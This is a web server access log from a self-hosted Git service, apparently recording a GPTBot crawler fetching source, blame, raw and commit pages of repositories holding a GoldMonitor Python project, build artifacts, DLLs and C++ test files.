"/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 9865] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:14:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 2179832] [Gzip 21.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:14:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:14:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 11519] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:14:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 9866] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:14:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11376] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 11523] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:14:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 110366] [Gzip 18.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:14:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:14:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 110337] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:14:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:14:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 156029] [Gzip 31.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:14:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 266046] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:14:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 1056898] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:14:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 4258] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:14:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 9873] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:14:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10443] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 266046] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:14:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 156029] [Gzip 31.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:14:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 155992] [Gzip 31.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:14:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 266046] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:14:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 9903] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:14:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 9903] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:14:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 18585] [Gzip 5.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 10853] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" -[17/Feb/2026:14:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 12520] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 19390] [Gzip 6.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 20757] [Gzip 7.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 10857] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" -[17/Feb/2026:14:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:14:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 12491] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 21347] [Gzip 7.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 12596] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm" -[17/Feb/2026:14:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:14:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 9904] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:14:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:14:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:14:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 2179834] [Gzip 21.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:14:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 9867] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:14:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 11748] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:14:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 9868] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:14:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 11719] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:14:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:14:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 9887] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:14:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 9500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:14:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 10414] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:14:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 20465] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:14:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 312512] [Gzip 21.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:14:26:04 +0000] - 200 200 - GET https 